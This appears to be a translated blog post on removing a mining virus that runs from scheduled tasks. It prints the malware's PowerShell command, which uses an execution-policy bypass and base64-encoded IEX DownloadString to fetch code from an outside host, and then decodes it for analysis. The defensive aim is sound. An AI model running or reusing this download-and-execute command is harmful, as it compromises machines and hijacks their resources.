A simple fix for a mining virus that automatically downloads rogue software at boot

Not long ago a teacher asked me for help: his computer had a mining virus, and every time it powered on it automatically ran some malicious programs that kept the CPU busy and made the machine slow, while some malicious software kept appearing on the C drive from time to time. Because the system had problems of its own, he reset it, but before the reset he forgot to back up the WinRAR compression software, and in re-downloading it he inadvertently downloaded junk software; since then the computer has installed some rogue software onto the C drive at every boot.

Figure: the program that the mining virus automatically installs and runs on the C drive.

Solution:

A common way to solve this kind of problem is to open the Task Scheduler; it is very simple, just search for it directly in the search bar. Opening it shows:

Everything the system runs on a schedule is listed here. This is where malicious software implants its own "evil", causing the system to automatically run some malicious programs or automatically download software. For example, the mining virus's scheduled task:

There was also a similar task installed on my computer that relied on something like the 360 security browser to automatically download malware.

Disable and delete them directly, and the problems above are solved! Also uninstall the automatically downloaded malicious programs together with the rogue software they bring along!

 

So, how are these malicious programs work?

Looking at the code the mining virus program runs automatically, it is as follows:

powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA

That is, the code segment that PowerShell runs automatically is base64-encoded. I decoded it with Python; the decoding session follows:

C:\Users\pc>python
Python 3.6.4 (v3.6.4:d48eceb, Dec 19 2017, 06:54:40) [MSC v.1900 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> url = "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA"
>>> str_url = base64.b64decode(url)
>>> print(str_url)
b"I\x00E\x00X\x00 \x00(\x00(\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00n\x00e\x00t\x00.\x00w\x00e\x00b\x00c\x00l\x00i\x00e\x00n\x00t\x00)\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00s\x00t\x00r\x00i\x00n\x00g\x00(\x00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00.\x00s\x00s\x00l\x00s\x00n\x00g\x00y\x00l\x009\x000\x00.\x00c\x00o\x00m\x00'\x00)\x00)\x00"
>>> str_url = base64.b64decode(url).decode("utf-8")
>>> str(str_url)
"I\x00E\x00X\x00 \x00(\x00(\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00n\x00e\x00t\x00.\x00w\x00e\x00b\x00c\x00l\x00i\x00e\x00n\x00t\x00)\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00s\x00t\x00r\x00i\x00n\x00g\x00(\x00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00.\x00s\x00s\x00l\x00s\x00n\x00g\x00y\x00l\x009\x000\x00.\x00c\x00o\x00m\x00'\x00)\x00)\x00"
>>> str_url.replace('\x00','')
"IEX ((new-object net.webclient).downloadstring('http://cs.sslsngyl90.com'))"

Replacing the garbled characters gives a URL: http://cs.sslsngyl90.com
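As an added example (not the author's code), the same decode done properly for a Task Scheduler command line like the one above: PowerShell's -e / -EncodedCommand argument is base64 of the script as UTF-16LE, which is why the UTF-8 decode in the session above showed interleaved \x00 bytes; decoding as UTF-16LE gives clean text directly. The helper also pulls out the URL and the indicators (execution-policy bypass, download-and-execute) a defender would record for the task. The command line, the list of accepted flag spellings and the triage fields are my own construction.

```python
"""Decode and triage a PowerShell -EncodedCommand found in a scheduled task."""
import base64
import re
from typing import Optional

# Constructed from the Task Scheduler action quoted in the post
# (the base64 blob is the one shown on the page).
SAMPLE_CMDLINE = (
    "powershell.exe -ep bypass -e "
    "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAu"
    "AGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4A"
    "ZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA"
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENCODED_FLAGS = {"-e", "-ec", "-en", "-enc", "-encoded", "-encodedcommand"}
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[^\s'\"()]*)?", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if the flag is absent.

    The argument is base64 of the script encoded as UTF-16LE, so decoding as
    UTF-16LE yields clean text instead of NUL-interleaved bytes.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_FLAGS:
            raw = base64.b64decode(tokens[i + 1], validate=True)
            return raw.decode("utf-16-le")
    return None


def triage(cmdline: str) -> dict:
    """Decode the command and collect the indicators worth recording for the task."""
    script = decode_encoded_command(cmdline) or ""
    lowered = script.lower()
    return {
        "decoded_script": script or None,
        "urls": URL_RE.findall(script),
        # -ep bypass / -ExecutionPolicy Bypass disables the script-execution policy
        "bypasses_execution_policy": bool(
            re.search(r"-e(?:p|xecutionpolicy)\s+bypass", cmdline.lower())),
        # IEX (Invoke-Expression) over DownloadString = fetch remote code and run it in memory
        "downloads_and_executes": ("iex" in lowered or "invoke-expression" in lowered)
        and "downloadstring" in lowered,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```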

Opening it revealed the "mystery" inside.

That is a simple way of dealing with this kind of malware.


Origin www.cnblogs.com/ZominCeleste/p/12624168.html